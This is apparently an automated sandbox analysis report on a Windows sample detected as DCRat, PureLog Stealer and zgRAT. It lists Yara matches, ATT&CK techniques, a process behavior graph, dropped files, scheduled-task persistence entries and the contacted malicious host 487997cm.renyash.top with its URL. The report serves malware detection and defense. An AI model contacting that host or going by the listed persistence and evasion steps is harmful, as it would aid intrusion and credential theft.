                                Source: Yara matchFile source: 00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: agentFont.exe PID: 2120, type: MEMORYSTR
                                Yara detected PureLog Stealer
                                Source: Yara matchFile source: 5.0.agentFont.exe.f30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.65e7104.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.6efd104.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000005.00000000.1686628391.0000000000F32000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1663870017.0000025FF5CAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1669628043.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1668966554.00000000065A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\ApplicationFrameHost.exe, type: DROPPED
                                Source: Yara matchFile source: C:\mshypercomponentSavesdll\agentFont.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, type: DROPPED
                                Yara detected zgRAT
                                Source: Yara matchFile source: 5.0.agentFont.exe.f30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.65e7104.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.6efd104.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\ApplicationFrameHost.exe, type: DROPPED
                                Source: Yara matchFile source: C:\mshypercomponentSavesdll\agentFont.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, type: DROPPED

                                Remote Access Functionality

                                barindex
                                Yara detected DCRat
                                Source: Yara matchFile source: 00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: agentFont.exe PID: 2120, type: MEMORYSTR
                                Yara detected PureLog Stealer
                                Source: Yara matchFile source: 5.0.agentFont.exe.f30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.65e7104.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.6efd104.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000005.00000000.1686628391.0000000000F32000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1663870017.0000025FF5CAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1669628043.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1668966554.00000000065A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\ApplicationFrameHost.exe, type: DROPPED
                                Source: Yara matchFile source: C:\mshypercomponentSavesdll\agentFont.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, type: DROPPED
                                Yara detected zgRAT
                                Source: Yara matchFile source: 5.0.agentFont.exe.f30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.65e7104.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.6efd104.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Recovery\ApplicationFrameHost.exe, type: DROPPED
                                Source: Yara matchFile source: C:\mshypercomponentSavesdll\agentFont.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information11
                                Scripting                                		Valid Accounts11
                                Windows Management Instrumentation                                		11
                                Scripting                                		1
                                Exploitation for Privilege Escalation                                		11
                                Disable or Modify Tools                                		OS Credential Dumping1
                                System Time Discovery                                		Remote Services11
                                Archive Collected Data                                		1
                                Encrypted Channel                                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts1
                                Exploitation for Client Execution                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		11
                                Deobfuscate/Decode Files or Information                                		LSASS Memory3
                                File and Directory Discovery                                		Remote Desktop ProtocolData from Removable Media2
                                Non-Application Layer Protocol                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts2
                                Command and Scripting Interpreter                                		Logon Script (Windows)12
                                Process Injection                                		3
                                Obfuscated Files or Information                                		Security Account Manager137
                                System Information Discovery                                		SMB/Windows Admin SharesData from Network Shared Drive12
                                Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook13
                                Software Packing                                		NTDS221
                                Security Software Discovery                                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                Timestomp                                		LSA Secrets1
                                Process Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                DLL Side-Loading                                		Cached Domain Credentials131
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items233
                                Masquerading                                		DCSync1
                                Application Window Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
                                Virtualization/Sandbox Evasion                                		Proc Filesystem1
                                Remote System Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                                Process Injection                                		/etc/passwd and /etc/shadow1
                                System Network Configuration Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582993 Sample: QH67JSdZWl.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 88 487997cm.renyash.top 2->88 100 Found malware configuration 2->100 102 Antivirus detection for URL or domain 2->102 104 Antivirus detection for dropped file 2->104 106 12 other signatures 2->106 12 QH67JSdZWl.exe 21 2->12         started        15 DONEBnCAFZiOynZWpVVmZLvNQeA.exe 2->15         started        18 agentFont.exe 2->18         started        20 2 other processes 2->20 signatures3 process4 file5 70 C:\Users\user\AppData\...\mf04Loader.dll, PE32+ 12->70 dropped 72 C:\Users\user\AppData\Local\...\f5Mb10zb.exe, PE32 12->72 dropped 22 f5Mb10zb.exe 3 6 12->22         started        124 Antivirus detection for dropped file 15->124 126 Multi AV Scanner detection for dropped file 15->126 128 Machine Learning detection for dropped file 15->128 signatures6 process7 file8 66 C:\mshypercomponentSavesdll\agentFont.exe, PE32 22->66 dropped 68 kNSe5xQ3wI9ft6pWJZ...13JHxpBJ7xdPC40.vbe, data 22->68 dropped 114 Antivirus detection for dropped file 22->114 116 Multi AV Scanner detection for dropped file 22->116 118 Machine Learning detection for dropped file 22->118 26 wscript.exe 1 22->26         started        signatures9 process10 signatures11 120 Windows Scripting host queries suspicious COM object (likely to drop second stage) 26->120 122 Suspicious execution chain found 26->122 29 cmd.exe 1 26->29         started        process12 process13 31 agentFont.exe 3 20 29->31         started        35 conhost.exe 29->35         started        file14 74 C:\...\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, PE32 31->74 dropped 76 C:\...\DONEBnCAFZiOynZWpVVmZLvNQeA.exe, PE32 31->76 dropped 78 C:\Users\user\Desktop\kZFyeAfm.log, PE32 31->78 dropped 80 6 other malicious files 31->80 dropped 92 Antivirus detection for dropped file 31->92 94 Multi AV Scanner detection for dropped file 31->94 96 Machine Learning detection for dropped file 31->96 98 4 other signatures 31->98 37 cmd.exe 31->37         started        40 powershell.exe 31->40         started        42 powershell.exe 23 31->42         started        44 4 other processes 31->44 signatures15 process16 signatures17 108 Uses ping.exe to sleep 37->108 110 Uses ping.exe to check the status of other devices and networks 37->110 46 agentFont.exe 37->46         started        64 3 other processes 37->64 112 Loading BitLocker PowerShell Module 40->112 50 conhost.exe 40->50         started        52 WmiPrvSE.exe 40->52         started        54 conhost.exe 42->54         started        56 conhost.exe 44->56         started        58 conhost.exe 44->58         started        60 conhost.exe 44->60         started        62 conhost.exe 44->62         started        process18 dnsIp19 90 487997cm.renyash.top 185.158.202.52, 49736, 49738, 49739 PREVIDER-ASNL Netherlands 46->90 82 C:\Users\user\Desktop\rEqPmwUs.log, PE32 46->82 dropped 84 C:\Users\user\Desktop\HOfmkikL.log, PE32 46->84 dropped 86 C:\Users\user\Desktop\AnJfWYZZ.log, PE32 46->86 dropped file20

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                QH67JSdZWl.exe44%VirustotalBrowse
                                QH67JSdZWl.exe61%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                QH67JSdZWl.exe100%Joe Sandbox ML

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\z0MvDYgz73.bat100%AviraBAT/Delbat.C
                                C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe100%AviraVBS/Runner.VPG
                                C:\mshypercomponentSavesdll\agentFont.exe100%AviraHEUR/AGEN.1339906
                                C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe100%AviraHEUR/AGEN.1339906
                                C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe100%AviraHEUR/AGEN.1339906
                                C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe100%AviraHEUR/AGEN.1339906
                                C:\Recovery\ApplicationFrameHost.exe100%AviraHEUR/AGEN.1339906
                                C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe100%AviraVBS/Runner.VPG
                                C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe100%AviraHEUR/AGEN.1339906
                                C:\Users\user\Desktop\cvxIvGPF.log100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\kZFyeAfm.log100%Joe Sandbox ML
                                C:\mshypercomponentSavesdll\agentFont.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\AnJfWYZZ.log100%Joe Sandbox ML
                                C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe100%Joe Sandbox ML
                                C:\Recovery\ApplicationFrameHost.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\rEqPmwUs.log100%Joe Sandbox ML
                                C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Recovery\ApplicationFrameHost.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe83%ReversingLabsWin32.Trojan.Uztuby
                                C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\mf04Loader.dll0%ReversingLabs
                                C:\Users\user\Desktop\AnJfWYZZ.log9%ReversingLabs
                                C:\Users\user\Desktop\HOfmkikL.log25%ReversingLabs
                                C:\Users\user\Desktop\HhjUFBqv.log25%ReversingLabs
                                C:\Users\user\Desktop\cvxIvGPF.log8%ReversingLabs
                                C:\Users\user\Desktop\kZFyeAfm.log9%ReversingLabs
                                C:\Users\user\Desktop\rEqPmwUs.log8%ReversingLabs
                                C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\mshypercomponentSavesdll\agentFont.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://487997cm.renyash.top/VideoFlowergeneratorTestpublic.php100%Avira URL Cloudmalware
                                http://www.w3.0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                487997cm.renyash.top
                                		185.158.202.52
                                		truetrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://487997cm.renyash.top/VideoFlowergeneratorTestpublic.phpfalse
                                  • Avira URL Cloud: malware
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://nuget.org/NuGet.exepowershell.exe, 00000018.00000002.3033324077.0000026E35256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2251897413.000001E9EC8D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3035292117.0000019B3F6D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3003208028.000001A2507E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2522595747.000001DFCDB07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2304934711.000001AC664A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.w3.agentFont.exe, 00000026.00000002.2305020580.0000000002B1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.t.com/pkpowershell.exe, 0000001F.00000002.2840898058.000001DFD5B90000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000018.00000002.1887548221.0000026E25409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1794029072.000001E9DCA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1878891712.0000019B2F889000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1878071385.000001A240998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1804997239.000001DFBDCB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000018.00000002.1887548221.0000026E25409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1794029072.000001E9DCA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1878891712.0000019B2F889000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1878071385.000001A240998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1804997239.000001DFBDCB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/powershell.exe, 00000020.00000002.2304934711.000001AC664A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://nuget.org/nuget.exepowershell.exe, 00000018.00000002.3033324077.0000026E35256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2251897413.000001E9EC8D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3035292117.0000019B3F6D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3003208028.000001A2507E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2522595747.000001DFCDB07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2304934711.000001AC664A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/Licensepowershell.exe, 00000020.00000002.2304934711.000001AC664A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/Iconpowershell.exe, 00000020.00000002.2304934711.000001AC664A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://aka.ms/pscore68powershell.exe, 00000018.00000002.1887548221.0000026E251E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1794029072.000001E9DC861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1878891712.0000019B2F661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1878071385.000001A240771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1804997239.000001DFBDA91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1798122050.000001AC56431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameagentFont.exe, 00000005.00000002.1729799646.0000000003609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1887548221.0000026E251E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1794029072.000001E9DC861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1878891712.0000019B2F661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1878071385.000001A240771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1804997239.000001DFBDA91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1798122050.000001AC56431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000020.00000002.1798122050.000001AC56659000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crl.microspowershell.exe, 00000018.00000002.3184176486.0000026E3D402000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2838857557.000001DFD5AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              185.158.202.52
                                                              		487997cm.renyash.topNetherlands
                                                              		20847PREVIDER-ASNLtrue

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1582993
                                                              Start date and time:2025-01-01 11:26:08 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 10m 37s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:54
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:QH67JSdZWl.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:c8228b107dfad48c1a7de8147fa1f6e4.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.expl.evad.winEXE@43/52@2/1
                                                              EGA Information:
                                                              • Successful, ratio: 23.1%
                                                              HCA Information:
                                                              • Successful, ratio: 73%
                                                              • Number of executed functions: 193
                                                              • Number of non-executed functions: 170
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe, ApplicationFrameHost.exe
                                                              • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target DONEBnCAFZiOynZWpVVmZLvNQeA.exe, PID 7984 because it is empty
                                                              • Execution Graph export aborted for target DONEBnCAFZiOynZWpVVmZLvNQeA.exe, PID 8016 because it is empty
                                                              • Execution Graph export aborted for target agentFont.exe, PID 7696 because it is empty
                                                              • Execution Graph export aborted for target agentFont.exe, PID 7832 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7284 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7292 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7308 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7328 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7352 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7376 because it is empty
                                                              • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              05:27:05API Interceptor211x Sleep call for process: powershell.exe modified
                                                              05:27:17API Interceptor3637878x Sleep call for process: agentFont.exe modified
                                                              10:27:03Task SchedulerRun new task: agentFont path: "C:\mshypercomponentSavesdll\agentFont.exe"
                                                              10:27:03Task SchedulerRun new task: agentFonta path: "C:\mshypercomponentSavesdll\agentFont.exe"
                                                              10:27:04Task SchedulerRun new task: ApplicationFrameHost path: "C:\Recovery\ApplicationFrameHost.exe"
                                                              10:27:04Task SchedulerRun new task: ApplicationFrameHostA path: "C:\Recovery\ApplicationFrameHost.exe"
                                                              10:27:04Task SchedulerRun new task: DONEBnCAFZiOynZWpVVmZLvNQeA path: "C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe"
                                                              10:27:04Task SchedulerRun new task: DONEBnCAFZiOynZWpVVmZLvNQeAD path: "C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe"
                                                              10:27:05Task SchedulerRun new task: RuntimeBroker path: "C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe"
                                                              10:27:05Task SchedulerRun new task: RuntimeBrokerR path: "C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe"

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              No context

                                                              Domains

                                                              No context

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              PREVIDER-ASNLkWZnXz2Fw7.elfGet hashmaliciousMiraiBrowse
                                                              • 84.241.133.1
                                                              aQvU3QHA3N.elfGet hashmaliciousUnknownBrowse
                                                              • 62.165.97.41
                                                              loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                              • 84.241.184.118
                                                              http://maritimecybersecurity.nlGet hashmaliciousUnknownBrowse
                                                              • 31.7.2.29
                                                              21y8z80div.elfGet hashmaliciousMiraiBrowse
                                                              • 80.65.103.15
                                                              botx.arm7.elfGet hashmaliciousMiraiBrowse
                                                              • 84.241.184.103
                                                              BLBq6xYqWy.elfGet hashmaliciousMiraiBrowse
                                                              • 80.65.126.250
                                                              https://expressinvoice.mijnparagon-cc.nl/Get hashmaliciousUnknownBrowse
                                                              • 84.241.158.7
                                                              https://expressinvoice.mijnparagon-cc.nl/Get hashmaliciousUnknownBrowse
                                                              • 84.241.158.7
                                                              UiuZNHab2t.elfGet hashmaliciousMiraiBrowse
                                                              • 62.165.71.164

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Users\user\Desktop\AnJfWYZZ.logEtqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                KzLetzDiM8.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  f3I38kv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    XNPOazHpXF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        CPNSQusnwC.exeGet hashmaliciousDCRatBrowse
                                                                          file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                            file.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              hjgesadfseawd.exeGet hashmaliciousDCRatBrowse
                                                                                adjthjawdth.exeGet hashmaliciousDCRatBrowse

                                                                                  Created / dropped Files

                                                                                  C:\Program Files (x86)\Microsoft.NET\9e8d7a4ca61bd9

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:ASCII text, with very long lines (602), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):602
